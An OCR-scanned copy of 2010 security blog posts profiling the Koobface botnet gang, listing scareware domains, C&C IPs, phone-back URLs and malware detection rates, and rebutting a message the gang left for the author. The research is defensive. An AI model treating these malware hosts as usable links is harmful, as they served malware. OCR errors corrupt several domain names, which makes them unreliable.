lgb-scanner.com - Email: test@now.net.cn 

lgig-antivirus.com - Email: test@now.net.cn 

lwebantivirus.com - Email: test@now.net.cn 

20gb-antivirus.com - Email: test@now.net.cn 

2gb-scanner.com - Email: test@now.net.cn 

2gig-antivirus.com - Email: test@now.net.cn 
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2mb-scanner.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3gb-scanner.com - Email: test@now.net.cn 
3gig-antivirus.com - Email: test@now.net.cn 
3mb-scanner.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net. 
3webantivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4gb-scanner.com - Email: test@now.net.cn 
4gig-antivirus.com - Email: test@now.net.cn 
4mb-scanner.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
50gb-antivirus.com - Email: test@now.net.cn 
5gb-scanner.com - Email: test@now.net.cn 
5gig-antivirus.com - Email: test@now.net.cn 
5mb-scanner.com - Email: test@now.net.cn 



5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6mb-scanner.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
aweb-antispyware.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dwebantivirus.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 

- setup.exe - [30]Gen:Variant.Koobface.2; W32.Koobface - 
Result: 15/40 (37.5 %) 

- MalvRem _312s2.exe - [31]W32/FakeAlert.5.'Maximus; 
Trojan. Win32.FakeAV - Result: 10/41 (24.4 %) which once 
executed phones back to: 

- slsystem.com/download/winlogo.bmp - 

91.213.157.104 , AS 13618, CARONET-AS - Email: 
con ta ct@priva cy- 


protect.cn 



- networkilO.com - 91.213.217.106', A542473, ANEXIA-A5 

- Email: contact@privacy-protect.cn 

UPDATED: Wednesday, May 19, 2010 : 

The current redirection taking place through the embedded 
link on Koobface infected hosts, takes place through: 

www3.coantys-48td.xorg.pl - 188.124.5.66 - A544565, 
VITAL TEKNOLOJI 

- wwwl.fastsearch.cz.cc - 207.58.177.96 - A525847, 
5ERVINT Servlnt Corporation 

Detection rates: 

- setup.exe - [32]Win32/Koobface.NCX; 

Gen:Variant.Koobface.2 - Result: 13/41 (31.71 %) 

- packupdate _buildl07 _2039.exe - 

[33]W32/FakeAV.AMIgenr; Mal/FakeAV-AX - Result: 8/41 
(19.52 %) 
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Upon execution, the scareware sample phones back to: 

updatel.myownguardian.com - 94.228.209.223, 
A547869, NETR0UTING-A5 - Email: gkook@checkjemail.nl 

update2.myownguardian.net - 93.186.124.92, A544565, 
VITAL TEKNOLOJI - Email: gkook@checkjemail.nl 

UPDATED Moday, May 24, 2010 : 


The following Koobface sea reware domains/redirectors have 
been pushed 

by the Koobface gang over the pat 7 days. All of them 
continue using the services of AS31252, STARNET-AS 
StarNet Moldova at 195.5.161.210 and 
195.5.161.211. 

Oweb-antispyware.com - Email: test@now.net.cn 
12netantispy.com - Email: test@now.net.cn 
13netantispy.com - Email: test@now.net.cn 
14netantispy.com - Email: test@now.net.cn 
15netantispy.com - Email: test@now.net.cn 
16netantispy.com - Email: test@now.net.cn 
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lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lcnetantispy.com - Email: test@now.net.cn 
ldnetantispy.com - Email: test@now.net.cn 
leliminatemalware.com - Email: test@now.net.cn 
leliminatespy.com - Email: test@now.net.cn 
leliminatethreats.com - Email: test@now.net.cn 
leliminatevirus.com - Email: test@now.net.cn 



lenetantispy.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
lwebfilterlOOO.com - Email: test@now.net.cn 
lwww-antispyware.com - Email: test@now.net.cn 
lwww-antivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2eliminatemalware.com - Email: test@now.net.cn 
2eliminatevirus.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
2www-antispyware.com - Email: test@now.net.cn 
2www-antivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 
3webantivirus.com - Email: test@now.net.cn 
3www-antispyware.com - Email: test@now.net.cn 
3www-antivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 



4webantivirus.com - Email: test@now.net.cn 
4www-antispyware.com - Email: test@now.net.cn 
4www-antivirus.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
5www-antispyware.com - Email: test@now.net.cn 
5www-antivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
a30windows-scan.com - Email: test@now.net.cn 
a40windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a60windows-scan.com - Email: test@now.net.cn 
americanscanner.com - Email: test@now.net.cn 
aresearchsecurity.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
barracudalO.com - Email: test@now.net.cn 
beguardsystem.com - Email: test@now.net.cn 



beguardsystem2.com - Email: test@now.net.cn 
bewareofthreat.com - Email: test@now.net.cn 
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bewareofydanger.com - Email: test@now.net.cn 
bprotectsystem.com - Email: test@now.net.cn 
bwebantivirus.com - Email: test@now.net.cn 
choclatescanner2.com - Email: test@now.net.cn 
cleanerscanner2.com - Email: test@now.net.cn 
cnn2scanner.com - Email: test@now.net.cn 
cprotectsystem.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dacota4security.com - Email: test@now.net.cn 
defencyresearch.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defensecapability.com - Email: test@now.net.cn 
dprotectsystem.com - Email: test@now.net.cn 
dwebantivirus.com - Email: test@now.net.cn 
eliminatespy.com - Email: test@now.net.cn 
eiiminatethreat.com - Email: test@now.net.cn 



eliminatethreats.com - Email: test@now.net.cn 
eprotectsystem.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
fantasticscan2.com - Email: test@now.net.cn 
fortescanner.com - Email: test@now.net.cn 
four4defence.com - Email: test@now.net.cn 
fprotectsystem.com - Email: test@now.net.cn 
house2call.com - Email: test@now.net.cn 
house4call.com - Email: test@now.net.cn 
ibewareofdanger.com - Email: test@now.net.cn 
iresearchdefence.com - Email: test@now.net.cn 
ldefenceresearch.com - Email: test@now.net.cn 
micro2smart.com - Email: test@now.net.cn 
micro4smart.com - Email: test@now.net.cn 
micro6smart.com - Email: test@now.net.cn 
necessitydefense.com - Email: test@now.net.cn 
nolongerthreat.com - Email: test@now.net.cn 
nova3-antispyware.com - Email: test@now.net.cn 
nova4-antispyware.com - Email: test@now.net.cn 
nova5-antispyware.com - Email: test@now.net.cn 



nova7-antispyware.com - Email: test@now.net.cn 
nova8-antispyware.com - Email: test@now.net.cn 
nova-antivirusl.com - Email: test@now.net.cn 
nova-antivirus2.com - Email: test@now.net.cn 
novascanner2.com - Email: test@now.net.cn 
nova-scanner2.com - Email: test@now.net.cn 
novascanner3.com - Email: test@now.net.cn 
nova-scanner3.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 
nova-scanner4.com - Email: test@now.net.cn 
novascanner5.com - Email: test@now.net.cn 
nova-scanner5.com - Email: test@now.net.cn 
novascanner7.com - Email: test@now.net.cn 
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nova-scanner7.com - Email: test@now.net.cn 
onguardsystem2.com - Email: test@now.net.cn 
overllscanner.com - Email: test@now.net.cn 
pcguardsystem2.com - Email: test@now.net.cn 
pcguardsystems.com - Email: test@now.net.cn 
pcpiscanner.com - Email: test@now.net.cn 



pitstopscan.com - Email: test@now.net.cn 
protectionfunctions.com - Email: test@now.net.cn 
protectionmeasure.com - Email: test@now.net.cn 
protectionmethods.com - Email: test@now.net.cn 
protectionoffices.com - Email: test@now.net.cn 
protectionprinciples.com - Email: test@now.net.cn 
protectsystema.com - Email: test@now.net.cn 
protectsystemc.com - Email: test@now.net.cn 
protectsystemd.com - Email: test@now.net.cn 
protectsysteme.com - Email: test@now.net.cn 
protectsystemf.com - Email: test@now.net.cn 
researchdefence.com - Email: test@now.net.cn 
researchysecurity.com - Email: test@now.net.cn 
spywarekillera.com - Email: test@now.net.cn 
spywarekillerc.com - Email: test@now.net.cn 
spywarekillerd.com - Email: test@now.net.cn 
spywarekillere.com - Email: test@now.net.cn 
spywarekillerr.com - Email: test@now.net.cn 
spywarekillerz5.com - Email: test@now.net.cn 
stainsscanner2.com - Email: test@now.net.cn 



stop20attack.com - Email: test@now.net.cn 
tendefender2.com - Email: test@now.net.cn 
thelosers2010.com - Email: test@now.net.cn 
trivalsoftware.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
use6defence.com - Email: test@now.net.cn 
viruskiller3a.com - Email: test@now.net.cn 
viruskiller4a.com - Email: test@now.net.cn 
viruskiller5a.com - Email: test@now.net.cn 
viruskiller6a.com - Email: test@now.net.cn 
webfiiterlOO.com - Email: test@now.net.cn 
webfilter999.com - Email: test@now.net.cn 
winguardsystem.com - Email: test@now.net.cn 
yourguardsystem.com - Email: test@now.net.cn 
yourguardsystem2.com - Email: test@now.net.cn 
z22windows-scan.com - Email: test@now.net.cn 
z23windows-scan.com - Email: test@now.net.cn 
z25windows-scan.com - Email: test@now.net.cn 
z27windows-scan.com - Email: test@now.net.cn 



zaresearchsecurity.com - Email: test@now.net.cn 
Detection rates: 

- setup.exe - [34]Net-Worm:W32/Koobface.HN; 
Mal/Koobface-D - Result: 11/41 (26.83 %) 
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- avdistr_312.exe - [35]Trojan.FakeAV!gen24; 

Trojan.FakeAV - Result: 8/41 (19.52 %) 

Upon execution phones back to: 

slsystem.com/do wnioad/winiogo. bmp - 

91.213.157.104 - Email: contact@privacy-protect.cn 

accsupdate.com/?b=l 03si -193.105.134.115 - Email: 
contact@privacy-protect. cn 

Previous parked on 91.213.217.106, A542473, ANEXIA-AS 
now responding to 193.105.134.115, AS42708, PORTLANE: 

networkilO.com - Email: contact@privacy-protect.cn 

winsecuresoftorder.com - Email: contact@privacy- 
protect.cn 

time-zoneserver.com - Email: contact@privacy-protect.cn 
lblacklist.com - Email: contact@privacy-protect.cn 

In order to understand the importance of profiling Koobface 
gang's activities, consider going their their under¬ 
ground multitasking campaigns in the related posts. 

Related Koobface botnet/Koobface gang research: 



[3 6] From the Koobface Gang with Sea re ware Serving 
Compromised Sites 

[37] Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 

[38] Koobface Redirectors and Sea re ware Campaigns Now 
Fiosted in Moldova 

[39] 10 things you didn't know about the Koobface gang 

[40] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[41 ]Fiow the Koobface Gang Monetizes Mac OS X Traffic 

[42] The Koobface Gang Wishes the Industry "Fiappy 
FI olid ays" 

[43] Koobface-Friendly Riccom LTD - AS29550 - (Finally) 
Taken Offline 

[44] Koobface Botnet Starts Serving Client-Side Exploits 

[45] Massive Sea re ware Serving Blackhat SEO, the Koobface 
Gang Style 

[46] Koobface Botnet's Scareware Business Model - Part Two 

[47] Koobface Botnet's Scareware Business Model - Part One 

[48] Koobface Botnet Redirects Facebook’s IP Space to my 
Blog 

[49] New Koobface campaign spoofs Adobe's Flash updater 

[50] Social engineering tactics of the Koobface botnet 



[51] Koobface Botnet Dissected in a Trend Micro Report 

[52] Movement on the Koobface Front - Part Two 

[53] Movement on the Koobface Front 

[54] Koobface - Come Out, Come Out, Wherever You Are 

[55] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [56]Dancho 
Danchev's blog. Follow him [57Jon Twitter. 
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Koobface Gang Responds to the "10 Things You 
Didn't Know About the Koobface Gang Post" 

(2010-05-17 21:23) 

UPDATED Moday, May 24, 2010: The scareware 
domains/redirectors pushed by the Koobface botnet, have 
been 

included at the bottom of this post, including detection 
rates and phone back URLs. 

On May 13th, 2010, the Koobface gang responded to my " 

[1]10 things you didn't know about the Koobface 

gang " post published in February, 2010, by including the 
following message within Koobface-infected hosts, serving 
bogus video players, and, of course, scareware: 

• regarding this [2/article By Dancho Danchev / February 
23, 2010, 9:30am PST 












1. no connection 2 . what's reason to buy software just for 
one screenshot? 3. no connection 4. :) 5. :) 6. :) 7. 

it was 'aii baba & 4' originally, you should be more careful 
8. heh 9. strange error there're no experiments on that 10. 
maybe, not 100 % sure 

Aii Baba 13 may 2010 

This is the [3]second individual message left by the 
botnet masters for me, and the third one in general 
where I'm referenced. 

What makes an impression is their/his attempt to distance 
themselves/himself from major campaigns affect¬ 
ing high profile U.S based web properties, fraudulent 
activities such as dick fraud, and their/his attempt to 
legitimize their/his malicious activities by emphasizing on 
the fact that they/he are not involved in crimeware 
campaigns, and have never stolen any credit card details. 

01. [4]The gang is connected to, probably 
maintaining the dick-fraud facilitating Bahama 
botnet 

- Koobface gang: no connection 
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You wish, you wish. [5]ClickForensics pointed it out, [6]l 
confirmed it, and at a later stage reproduced it. 

Among the many examples of this activities, is MD5: 

Ofbfla9f8e6e305138151440da58b4fl modifying the 


HOSTS file on the infected PCs to [7]redirect all the 
Google and Yahoo search traffic to 89.149.210.109, 
whereas, in [8]between phoning back to well known 

[9]Koobface sea reware C &Cs at the time, such as 
212.117.160.18, and urodinam .net/8732489273.php at 

the time. 

In May, 2010, parked on the very same IP to which 
urodinam.net (91.188.59.10) is currently responding to, 
is an active [10]client-side exploits serving campaign 
using the YES malware exploitation kit 

(Izabslwvn538n4i5tcjl.com - 

Email: michaeltycoon@gmail. com). 

/ can go on forever. 

02. [llJDespite their steady revenue flow from sales 
of scareware, the gang once used trial software to 
take a screenshot of a YouTube video 

- Koobface gang: what's reason to buy software just for one 
screenshot? 
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No reason at all, I guess that's also the reason behind the 
temporary change in [12]scareware URIs to include 
GREED within the file name. 

03. [13]The Koobface gang was behind the 
malvertising attack the hit the web site of the New 
York Times 

in September 

- Koobface gang: no connection 



You wish, you wish. 

In fact, several of the recent high-profile malvertising 
campaigns that targeted major Web 2.0 properties, can 

be also traced back to their infrastructure. Now, whether 
they are aware of the true impact of the malvertisement 
campaign, and whether they are intentionally pushing it at 
a particular web site remains unknown. 

The fact is that, the exact [14]same domain that was 
used in the NYTimes redirection, was also back then 

embedded on all of the Koobface infected hosts, in 

order to serve sea re ware. 


04. 


[15]The gang conducted a several hours experiment 
in November, 2009 when for the first time ever 

client-side exploits were embedded on Koobface¬ 
serving compromised hosts 

- Koobface gang::) 

He who smiles last, smiles best. 

05. [16]The Koobface gang was behind the massive 
(1+ million affected web sites) scareware serving 
cam¬ 
paign in November, 2009 

- Koobface gang::) 

Since they're admitting their involvement in point 5, they 
also don't know/forget that one of the many ways 



the [17]connection between the Koobface gang and 
massive blackhat SEO campaign was established in 
exactly the same way as the one in their involvement in the 
NYTimes malvertising campaign. Convenient denial of 
involvement 

in high-profile campaigns means nothing when collected 
data speaks for itself 

06. [18]The Koobface Gang Monetizes Mac OS X 
Traffic through adult dating/Russian online movie 
market¬ 
places 

- Koobface gang::) 

Read more on the practice - " [19] How the Koobface 
Gang Monetizes Mac OS X Traffic ". 
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07. [20JAH Baba and 40 LLC a.k.a the Koobface gang 
greeted the security community on Christmas 

- Koobface gang: it was 'ali baba & 4' originally you should 
be more careful 

Since the original [21 ]Ali Baba had 40 thieves with him, 

not 4, the remaining 36 can be best described as the 
cybee rime ecosystem's stakeholders earning revenues and 
having their business models scaling, thanks to the 

involvement of the Koobface botnet. 


08. [22]The Koobface gang once redirected 
Facebook's IP space to my personal blog 

- Koobface gang: heh 

Read more on the topic - " [23] Koobface Botnet 
Redirects Facebook's IP Space to my Blog ". 

09. [24]The gang is experimenting with alternative 
propagation strategies, such as for instance Skype 
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- Koobface gang: strange error, there're no experiments on 
that 

Hmm, who should I trust? [25]SophosLabs and 
[26]TrendMicro or the Koobface gang? SophosLabs and 
Trend Micro or the Koobface gang? Soph os Labs and 
Trend Micro or....well you get the point. Of course there isn't, 
now that's is publicly known it's in the works. 

10. [27]The gang is monetizing traffic through the 
Crusade Affiliates scareware network 

- Koobface gang: maybe, not 100 % sure 

They don't know where they get ail the money by being 
pushing scareware? How convenient. 

When data and facts talk, even "CyberJesus" listens. Read 
more on the monetization model - " [28]Koobface 
Botnet's Scareware Business Model " [29]Koobface 
Botnet's Scareware Business Model - Part Two ". 


The Koobface botnet is currently pushing sea re ware through 

2gig-antivirus.com?mid=312 &code=4dbl2f &d=l 

&s=2 - 195.5.161.210 - Email: test@now.net.cn 
457 



Ow*fe andspywart com 



Parked on the same IP (195.5.161.210 , AS31252, STARNET- 
AS StarNet Moldova) are also: 

Oweb-antispyware.com - Email: test@now.net.cn 

12netantispy.com - Email: test@now.net.cn 

13netantispy.com - Email: test@now.net.cn 





14netantispy.com - Email: test@now.net.cn 
16netantispy.com - Email: test@now.net.cn 
lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lgb-scanner.com - Email: test@now.net.cn 
lgig-antivirus.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2gb-scanner.com - Email: test@now.net.cn 
2gig-antivirus.com - Email: test@now.net.cn 
458 

2mb-scanner.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3gb-scanner.com - Email: test@now.net.cn 
3gig-antivirus.com - Email: test@now.net.cn 
3mb-scanner.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 



3webantivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4gb-scanner.com - Email: test@now.net.cn 
4gig-antivirus.com - Email: test@now.net.cn 
4mb-scanner.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
50gb-antivirus.com - Email: test@now.net.cn 
5gb-scanner.com - Email: test@now.net.cn 
5gig-antivirus.com - Email: test@now.net.cn 
5mb-scanner.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6mb-scanner.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
aweb-antispyware.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 



dwebantivirus.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 

- setup.exe - [30]Gen:Variant.Koobface.2; W32.Koobface - 
Result: 15/40 (37.5 %) 

- MalvRem _312s2.exe - [31JW3 2/FakeAlert.5!Maximus; 
Trojan. Win32.FakeAV - Result: 10/41 (24.4 %) which once 
executed phones back to: 

- slsystem.com/download/winlogo.bmp - 

91.213.157.104, AS 13618, CARONET-AS - Email: 
contact@pri vacy- 

protect.cn 

- networkilO.com - 91.213.217.106, AS42473, ANEXIA-AS - 
Email: contact@privacy-protect, cn 

UPDATED: Wednesday; May 19, 2010 : 

The current redirection taking place through the embedded 
link on Koobface infected hosts, takes place through: 

www3.coantys-48td.xorg.pl - 188.124.5.66 - AS44565, 
VITAL TEKNOLOJI 

- wwwl.fastsearch.cz.cc - 207.58.177.96 - AS25847, 
SERVINT Servlnt Corporation 

Detection rates: 

- setup.exe - [32]Win32/Koobface.NCX; 

Gen:Variant.Koobface.2 - Result: 13/41 (31.71 %) 



- packupdate _buildl07_2039.exe - 

[33]W32/FakeAV.AM!genr; MaI/FakeAV-AX - Result: 8/41 
(19.52 %) 
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Upon execution, the sea re ware sample phones back to 


updatel.myownguardian.com - 94.228.209.223, 
AS47869, NETROUTING-AS - Email: gkook@checkjemail.nl 

update2.myownguardian.net - 93.186.124.92, AS44565, 
VITAL TEKNOLOJI - Email: gkook@checkjemail.nl 

UPDATED Moday, May 24, 2010 : 

The following Koobface sea re ware domains/redirectors have 
been pushed 

by the Koobface gang over the pat 7 days. AH of them 
continue using the services of AS31252, STARNET-AS 
StarNet Moldova at 195.5.161.210 and 195.5.161.211. 

Oweb-antispyware.com - Email: test@now.net.cn 

12netantispy.com - Email: test@now.net.cn 

13netantispy.com - Email: test@now.net.cn 

14netantispy.com - Email: test@now.net.cn 

15netantispy.com - Email: test@now.net.cn 

16netantispy.com - Email: test@now.net.cn 
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lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lcnetantispy.com - Email: test@now.net.cn 
ldnetantispy.com - Email: test@now.net.cn 
leliminatemalware.com - Email: test@now.net.cn 



leliminatespy.com - Email: test@now.net.cn 
leliminatethreats.com - Email: test@now.net.cn 
leliminatevirus.com - Email: test@now.net.cn 
lenetantispy.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
lwebfiiterlOOO.com - Email: test@now.net.cn 
lwww-antispyware.com - Email: test@now.net.cn 
lwww-antivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2eliminatemalware.com - Email: test@now.net.cn 
2eliminatevirus.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
2www-antispyware.com - Email: test@now.net.cn 
2www-antivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 
3webantivirus.com - Email: test@now.net.cn 
3www-antispyware.com - Email: test@now.net.cn 



3www-antivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
4www-antispyware.com - Email: test@now.net.cn 
4www-antivirus.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
5www-antispyware.com - Email: test@now.net.cn 
5www-antivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
a30windows-scan.com - Email: test@now.net.cn 
a40windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a60windows-scan.com - Email: test@now.net.cn 
americanscanner.com - Email: test@now.net.cn 
aresearchsecurity.com - Email: test@now.net.cn 



awebantivirus.com - Email: test@now.net.cn 
barracudalO.com - Email: test@now.net.cn 
beguardsystem.com - Email: test@now.net.cn 
beguardsystem2.com - Email: test@now.net.cn 
bewareofthreat.com - Email: test@now.net.cn 
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bewareofydanger.com - Email: test@now.net.cn 
bprotectsystem.com - Email: test@now.net.cn 
bwebantivirus.com - Email: test@now.net.cn 
choclatescanner2.com - Email: test@now.net.cn 
cleanerscanner2.com - Email: test@now.net.cn 
cnn2scanner.com - Email: test@now.net.cn 
cprotectsystem.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dacota4security.com - Email: test@now.net.cn 
defencyresearch.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defensecapability.com - Email: test@now.net.cn 
dprotectsystem.com - Email: test@now.net.cn 



dwebantivirus.com - Email: test@now.net.cn 
eliminatespy.com - Email: test@now.net.cn 
eliminatethreat.com - Email: test@now.net.cn 
eliminatethreats.com - Email: test@now.net.cn 
eprotectsystem.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
fantasticscan2.com - Email: test@now.net.cn 
fortescanner.com - Email: test@now.net.cn 
four4defence.com - Email: test@now.net.cn 
fprotectsystem.com - Email: test@now.net.cn 
house2call.com - Email: test@now.net.cn 
house4call.com - Email: test@now.net.cn 
ibewareofdanger.com - Email: test@now.net.cn 
iresearchdefence.com - Email: test@now.net.cn 
ldefenceresearch.com - Email: test@now.net.cn 
micro2smart.com - Email: test@now.net.cn 
micro4smart.com - Email: test@now.net.cn 
micro6smart.com - Email: test@now.net.cn 
necessitydefense.com - Email: test@now.net.cn 
nolongerthreat.com - Email: test@now.net.cn 



nova3-antispyware.com - Email: test@now.net.cn 
nova4-antispyware.com - Email: test@now.net.cn 
nova5-antispyware.com - Email: test@now.net.cn 
nova7-antispyware.com - Email: test@now.net.cn 
nova8-antispyware.com - Email: test@now.net.cn 
nova-antivirusl.com - Email: test@now.net.cn 
nova-antivirus2.com - Email: test@now.net.cn 
novascanner2.com - Email: test@now.net.cn 
nova-scanner2.com - Email: test@now.net.cn 
novascanner3.com - Email: test@now.net.cn 
nova-scanner3.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 
nova-scanner4.com - Email: test@now.net.cn 
novascanner5.com - Email: test@now.net.cn 
nova-scanner5.com - Email: test@now.net.cn 
novascanner7.com - Email: test@now.net.cn 
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nova-scanner7.com - Email: test@now.net.cn 
onguardsystem2.com - Email: test@now.net.cn 
overllscanner.com - Email: test@now.net.cn 



pcguardsystem2.com - Email: test@now.net.cn 
pcguardsystems.com - Email: test@now.net.cn 
pcpiscanner.com - Email: test@now.net.cn 
pitstopscan.com - Email: test@now.net.cn 
protectionfunctions.com - Email: test@now.net.cn 
protectionmeasure.com - Email: test@now.net.cn 
protectionmethods.com - Email: test@now.net.cn 
protectionoffices.com - Email: test@now.net.cn 
protectionprincipies.com - Email: test@now.net.cn 
protectsystema.com - Email: test@now.net.cn 
protectsystemc.com - Email: test@now.net.cn 
protectsystemd.com - Email: test@now.net.cn 
protectsysteme.com - Email: test@now.net.cn 
protectsystemf.com - Email: test@now.net.cn 
researchdefence.com - Email: test@now.net.cn 
researchysecurity.com - Email: test@now.net.cn 
spywarekillera.com - Email: test@now.net.cn 
spywarekillerc.com - Email: test@now.net.cn 
spywarekillerd.com - Email: test@now.net.cn 
spywarekillere.com - Email: test@now.net.cn 



spywarekillerr.com - Email: test@now.net.cn 
spywarekillerz5.com - Email: test@now.net.cn 
stainsscanner2.com - Email: test@now.net.cn 
stop20attack.com - Email: test@now.net.cn 
tendefender2.com - Email: test@now.net.cn 
thelosers2010.com - Email: test@now.net.cn 
trivalsoftware.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
use6defence.com - Email: test@now.net.cn 
viruskiiier3a.com - Email: test@now.net.cn 
viruskiller4a.com - Email: test@now.net.cn 
viruskiller5a.com - Email: test@now.net.cn 
viruskiller6a.com - Email: test@now.net.cn 
webfilterlOO.com - Email: test@now.net.cn 
webfiiter999.com - Email: test@now.net.cn 
winguardsystem.com - Email: test@now.net.cn 
yourguardsystem.com - Email: test@now.net.cn 
yourguardsystem2.com - Email: test@now.net.cn 
z22windows-scan.com - Email: test@now.net.cn 



z23windows-scan.com - Email: test@now.net.cn 
z25windows-scan.com - Email: test@now.net.cn 
z27windows-scan.com - Email: test@now.net.cn 

zaresearchsecurity.com - Email: test@now.net.cn 
Detection rates: 

- setup.exe - [34]Net-Worm:W32/Koobface.HN; 
Mal/Koobface-D - Result: 11/41 (26.83 %) 
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- avdistr_312.exe - [35]Trojan.FakeAV!gen24; 

Trojan.FakeAV - Result: 8/41 (19.52 %) 

Upon execution phones back to: 

slsystem.com/download/winlogo.bmp - 91.213.157.104 

- Email: contact@privacy-protect.cn 

accsupdate.com/?b=103sl -193.105.134.115 - Email: 
contact@ privacy-protect, cn 

Previous parked on 91.213.217.106, A542473, ANEXIA-AS 
now responding to 193.105.134.115, AS42708, PORTLANE: 

networkilO.com - Email: contact@privacy-protect.cn 

winsecuresoftorder.com - Email: contact@privacy- 
protect.cn 

time-zoneserver.com - Email: contact@privacy-protect.cn 
lblacklist.com - Email: contact@privacy-protect.cn 



In order to understand the importance of profiling Koobface 
gang's activities, consider going their their under¬ 
ground multitasking campaigns in the related posts. 

Related Koobface botnet/Koobface gang research: 

[36] From the Koobface Gang with Scareware Serving 
Compromised Sites 

[37] Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 

[38] Koobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 

[39] 10 things you didn't know about the Koobface gang 

[40] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[41 ]How the Koobface Gang Monetizes Mac OS X Traffic 

[42] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[43] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[44] Koobface Botnet Starts Serving Client-Side Exploits 

[45] Massive Scareware Serving Blackhat SEO , the Koobface 
Gang Style 

[46] Koobface Botnet's Scareware Business Model - Part Two 

[47] Koobface Botnet's Scareware Business Model - Part One 



[48] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[49] New Koobface campaign spoofs Adobe's Flash updater 

[50] Socia\ engineering tactics of the Koobface botnet 
